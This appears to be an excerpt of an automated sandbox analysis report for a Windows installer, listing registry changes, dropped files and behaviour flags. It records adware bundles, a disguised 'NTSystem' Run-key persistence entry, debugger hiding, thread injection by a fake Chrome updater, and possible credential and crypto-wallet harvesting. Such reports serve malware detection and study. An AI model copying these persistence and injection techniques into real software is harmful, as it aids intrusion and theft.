| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{580243BF-3CEE-4131-A599-C6FED66BEB1B}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{251AD013-20AD-4C3F-8FE2-F66A429B4819}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{8F1C46F8-E697-4175-B240-CDE682A4BA2D}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{17BE78EE-B40A-4B9E-835F-38EC62F9D479}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D5599B6B-FA0C-45B5-8309-853B003EA412}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{580243BF-3CEE-4131-A599-C6FED66BEB1B}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D372F21-E6DA-4B82-881A-79F6CA6B6AE1}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{03141A2A-5C3A-458E-ABEC-0812AD7FF497}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{376BE474-56D4-4177-BB4E-5610156F36C8}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\CLSID\{b1cfdc44-dff4-204c-e500-42a98fc246ba}\LocalServer32\ = "\"C:\\Users\\Admin\\AppData\\Local\\OneLaunch\\5.17.4\\onelaunch.exe\" -ToastActivated" | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\onelaunch.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F6D29500-933C-447C-9D88-9D814AF73808}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{376BE474-56D4-4177-BB4E-5610156F36C8}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9DAB0CA5-AE19-41AE-955C-41DD44C52697}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{57CE581A-0CB6-4266-9CA0-19364C90A0B3}\InprocServer32\ = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\mbshlext.dll" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{b1cfdc44-dff4-204c-e500-42a98fc246ba}\LocalServer32 | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\onelaunch.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F415899A-1576-4C8B-BC9F-4854781F8A20}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
Accesses 2FA software files, possible credential harvesting
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Local\Temp\is-0CG1L.tmp\OneLaunch Setup_3x8a5.tmp | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Web Companion = "C:\\Users\\Admin\\AppData\\Roaming\\Lavasoft\\Web Companion\\Application\\WebCompanion.exe --minimize " | C:\Users\Admin\AppData\Roaming\Lavasoft\Web Companion\Application\WebCompanion.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleChromeAutoLaunch_822E9BCF957816ED0183A9A1E348BDB1 = "\"C:\\Users\\Admin\\AppData\\Local\\OneLaunch\\5.17.4\\chromium\\chromium.exe\" --no-startup-window /prefetch:5" | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe" | C:\ProgramData\19965126155501944123.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneLaunch = "C:\\Users\\Admin\\AppData\\Local\\OneLaunch\\5.17.4\\onelaunch.exe" | C:\Users\Admin\AppData\Local\Temp\is-0CG1L.tmp\OneLaunch Setup_3x8a5.tmp | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneLaunchChromium = "C:\\Users\\Admin\\AppData\\Local\\OneLaunch\\5.17.4\\ChromiumStartupProxy.exe" | C:\Users\Admin\AppData\Local\Temp\is-0CG1L.tmp\OneLaunch Setup_3x8a5.tmp | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneLaunch = "C:\\Users\\Admin\\AppData\\Local\\OneLaunch\\5.17.4\\onelaunch.exe /startedFrom=registry" | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\onelaunch.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneLaunchChromium = "C:\\Users\\Admin\\AppData\\Local\\OneLaunch\\5.17.4\\ChromiumStartupProxy.exe --tab-trigger=SystemStart" | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\onelaunch.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Web Companion = "C:\\Users\\Admin\\AppData\\Roaming\\Lavasoft\\Web Companion\\Application\\WebCompanion.exe --minimize " | C:\Users\Admin\AppData\Roaming\Lavasoft\Web Companion\Application\WebCompanion.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\19965126155501944123.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe | N/A |
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Detected potential entity reuse from brand google.
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\38D10539991D1B84467F968981C3969D_C92678066E2B4B4986BC7641EEC08637 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\117308CCCD9C93758827D7CC85BB135E | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FA0E447C3E79584EC91182C66BBD2DB7 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8890A77645B73478F5B1DED18ACBF795_C090A8C88B266C6FF99A97210E92B44D | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DA3B6E45325D5FFF28CF6BAD6065C907_FBEAFB4EE7383EC8E0A3A2C1EC7FCEAC | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\229169D96B9C20761B929D428962A0A2_FC65190A8D1232A1711F16F9F20C5149 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\38D10539991D1B84467F968981C3969D_C92678066E2B4B4986BC7641EEC08637 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\572BF21E454637C9F000BE1AF9B1E1A9 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\572BF21E454637C9F000BE1AF9B1E1A9 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_6E4F36431D86962EFD432400DF65AC90 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FA0E447C3E79584EC91182C66BBD2DB7 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1B1401C7EC8E96BC79CBFD92F9DF762D_E35D496D1CD0B884BEBCAFED0FE61600 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\229169D96B9C20761B929D428962A0A2_FC65190A8D1232A1711F16F9F20C5149 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_6E4F36431D86962EFD432400DF65AC90 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\117308CCCD9C93758827D7CC85BB135E | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8890A77645B73478F5B1DED18ACBF795_C090A8C88B266C6FF99A97210E92B44D | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DA3B6E45325D5FFF28CF6BAD6065C907_FBEAFB4EE7383EC8E0A3A2C1EC7FCEAC | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1B1401C7EC8E96BC79CBFD92F9DF762D_E35D496D1CD0B884BEBCAFED0FE61600 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\19965126155501944123.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 7432 set thread context of 584 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\System32\conhost.exe |
| PID 7432 set thread context of 2900 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\System32\conhost.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls\Styles\Base\ToolBarStyle.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls\Styles\Desktop\TableViewStyle.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\ComboBox.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Fusion\TextField.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Imagine\ToolTip.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\api-ms-win-core-profile-l1-1-0.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\api-ms-win-crt-string-l1-1-0.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls\MenuBar.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Universal\MenuBarItem.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-22.exe | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-11.exe | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Material\Button.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Material\SliderHandle.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Material\ToolTip.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\ToolButton.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Dialogs\plugins.qmltypes | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Templates.2\qtquicktemplates2plugin.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-13.exe | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls\Styles\Desktop\FocusFrameStyle.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Fusion\SwitchIndicator.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Imagine\ToolSeparator.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Material\Switch.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Material\VerticalHeaderView.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Universal\plugins.qmltypes | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files (x86)\chrome_ComponentUnpacker_BeginUnzipping6068_1008819595\manifest.fingerprint | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQml\Models.2\modelsplugin.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls\Styles\Desktop\SwitchStyle.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Imagine\ScrollBar.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Imagine\SwitchDelegate.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Material\PageIndicator.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\MenuItem.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\TextArea.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Dialogs\DefaultColorDialog.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\Qt5Quick.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls\Private\StackViewSlideDelegate.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Fusion\GroupBox.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\MbamBgNativeMsg.exe | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Material\SwipeDelegate.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\resources\icudtl.dat | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-26.exe | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls\Private\ModalPopupBehavior.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\DialogButtonBox.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Imagine\plugins.qmltypes | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Dialogs\qml\icons.ttf | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\Qt5WebEngineCore.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\libEGL.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-31.exe | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Fusion\SliderHandle.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Material\plugins.qmltypes | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Material\RectangularGlow.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls\Private\TableViewSelection.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls\Private\TextSingleton.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Fusion\Pane.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Fusion\VerticalHeaderView.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Imagine\BusyIndicator.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\mbamelam.sys | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\Qt5XmlPatterns.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls\Private\MenuItemSubControls.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtWebEngineProcess.exe | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\sdk\MBAMSwissArmy.inf | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-10.exe | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\Material\BoxShadow.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\QtQuick\Controls.2\ScrollIndicator.qml | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\security\logs\scecomp.log | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Downloads\FILES-S0ft\Setup32x64.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Downloads\FILES-S0ft\Setup32x64.exe | N/A |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Downloads\FILES-S0ft\Setup32x64.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Downloads\FILES-S0ft\Setup32x64.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe | N/A |
